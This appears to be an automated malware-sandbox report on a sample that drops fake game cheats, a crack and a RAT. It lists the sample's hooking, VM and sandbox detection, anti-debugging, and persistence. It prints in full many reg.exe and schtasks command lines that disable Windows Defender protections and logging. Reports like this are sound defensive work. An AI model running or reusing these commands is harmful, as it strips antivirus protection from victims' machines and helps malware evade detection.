Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Jump to dropped file
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Jump to dropped file
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1EF0005 value: E9 2B BA 45 75 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 7734BA30 value: E9 DA 45 BA 8A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1F00008 value: E9 8B 8E 49 75 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 77398E90 value: E9 80 71 B6 8A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1F10005 value: E9 8B 4D A2 74 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 76934D90 value: E9 7A B2 5D 8B Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 38E0005 value: E9 EB EB 06 73 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 7694EBF0 value: E9 1A 14 F9 8C Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 38F0005 value: E9 8B 8A 03 72 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 75928A90 value: E9 7A 75 FC 8D Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3900005 value: E9 2B 02 05 72 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 75950230 value: E9 DA FD FA 8D Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3910005 value: E9 8B 2F A7 73 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 77382F90 value: E9 7A D0 58 8C Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3920007 value: E9 EB DF A9 73 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 773BDFF0 value: E9 1E 20 56 8C Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Lunch LaCheatV2.exe, 00000006.00000002.2263995910.0000000000408000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Q|SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F8F9CE7A99Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F8F9DA92C7Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Special instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Special instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: 1BC027A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: 1BC1C300000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1816 Thread sleep count: 163 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 6600 Thread sleep count: 115 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 7072 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1812 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: vboxtray
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vboxservice
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: qemu-ga
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwareuser
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: vmusrvc
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwareservice+discordtokenprotector
Source: Lunch LaCheatV2.exe, 00000006.00000002.2266173953.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\-
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmsrvc
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmtoolsd
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwaretray
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: 52cheatand52rat.exe, 00000002.00000002.2202108160.000001BC0264E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe System information queried: KernelDebuggerInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process queried: DebugObjectHandle Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Disables Windows Defender (deletes autostart)
Source: C:\Windows\SysWOW64\reg.exe Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
